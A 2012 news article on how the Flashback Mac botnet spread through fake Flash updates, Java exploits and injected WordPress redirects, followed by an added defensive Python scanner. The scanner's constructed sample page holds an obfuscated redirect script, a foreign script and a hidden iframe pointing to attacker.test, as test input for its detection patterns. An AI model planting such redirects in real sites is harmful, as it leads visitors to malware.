Social Engineering Attack from Flashback

Monday, April 23, 2012 @ 08:04 AM gHale

The Mac OS X Flashback botnet spread through hacked WordPress web sites, first with fake Flash Player update prompts and later with drive-by Java exploits.

From September 2011 until February 2012, the Flashback creators distributed the Trojan through compromised WordPress sites that prompted users to download various iterations of a fake Adobe Flash Player update that was, in actuality, the Mac Trojan, according to Kaspersky Lab analysis.


The attacks initially relied on social engineering lures; it wasn’t until February 2012 that the Flashback authors began using exploits to grow the botnet. They exploited known Java vulnerabilities, at least two of which date back as far as June 2009. More importantly, though, Flashback’s creators took advantage of the window of exposure between Oracle’s and Apple’s patch schedules.

Apple creates its own patches to fix Java vulnerabilities instead of using Oracle’s, said Kaspersky’s Alex Gostev. So, Oracle already patched the bugs, but Apple had not yet deployed its own fixes. Gostev said on average, historically speaking, there is a two-month delay between Oracle’s fixes, which come first, and Apple’s.

In March 2012, Flashback’s authors started making use of a Russian partner (affiliate) program that injected redirect scripts into legitimate websites by means that have not been determined.

Gostev said tens of thousands of WordPress sites were hit in late February and early March, and noted that other estimates put the number as high as 100,000 infected sites. It’s unclear how the sites became infected, but Gostev believes the bloggers were either running vulnerable versions of WordPress or had installed the ToolsPack plugin.
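A site owner checking a WordPress install for this kind of injection needs a way to spot the redirector in the served HTML. The Python scanner below is an added example, not code from the article or from Kaspersky’s analysis: it parses a saved page and flags script tags loaded from hosts outside an allowlist, inline scripts that rewrite the browser location or decode obfuscated strings, hidden iframes and meta refreshes. The allowlist, the hostnames and both sample pages are constructed for the example; the article does not show the scripts the campaign actually injected, so the heuristics are generic, not a Flashback signature.

```python
"""Heuristic scan of saved HTML pages for injected redirect scripts.

Added example, not from the original article or from Kaspersky's analysis.
The sample pages, the hostnames and the heuristics are constructed for
illustration; they are not the scripts used by the Flashback campaign.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site is expected to load scripts from (assumed for the example).
ALLOWED_SCRIPT_HOSTS = {"example-blog.test", "cdn.example-blog.test"}

# Inline-script heuristics: (finding kind, pattern). Not a malware signature.
INLINE_PATTERNS = [
    ("redirect-script", re.compile(r"(window|document|top|self)\.location(\.href)?\s*=", re.I)),
    ("redirect-script", re.compile(r"location\.replace\s*\(", re.I)),
    ("obfuscated-script", re.compile(r"unescape\s*\(|String\.fromCharCode\s*\(", re.I)),
]


class ScriptCollector(HTMLParser):
    """Collects external script srcs, inline script bodies, hidden iframes and meta refreshes."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values of <script src=...>
        self.inline = []     # bodies of inline <script> elements
        self.findings = []   # (kind, detail) pairs found while parsing tags
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(a["src"])
            else:
                self._in_script = True
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if ("display:none" in style or "visibility:hidden" in style
                    or a.get("width") in ("0", "1") or a.get("height") in ("0", "1")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for one page; empty list means nothing flagged."""
    p = ScriptCollector()
    p.feed(html)
    findings = list(p.findings)
    for src in p.external:
        host = urlparse(src).hostname
        # A relative src has no host and is served by the site itself: not flagged.
        if host and host not in allowed_hosts:
            findings.append(("foreign-script", src))
    for body in p.inline:
        for kind, pat in INLINE_PATTERNS:
            if pat.search(body):
                findings.append((kind, pat.pattern))
    return findings


# Constructed sample pages (not captured from any real compromised site).
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example-blog.test/theme.js"></script>
</head><body><p>Hello</p></body></html>"""

INJECTED_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script>var u=unescape("%68%74%74%70"); window.location.href=u+"://attacker.test/update/";</script>
<script src="http://attacker.test/r.js"></script>
</head><body><p>Hello</p>
<iframe src="http://attacker.test/f/" width="1" height="1" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page))
```

Run it over pages fetched with a browser-like User-Agent as well as with a plain client, since redirectors of this type are often served only to visitors who look like end users; a page that is clean when fetched by a scanner can still be injected for a real browser.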
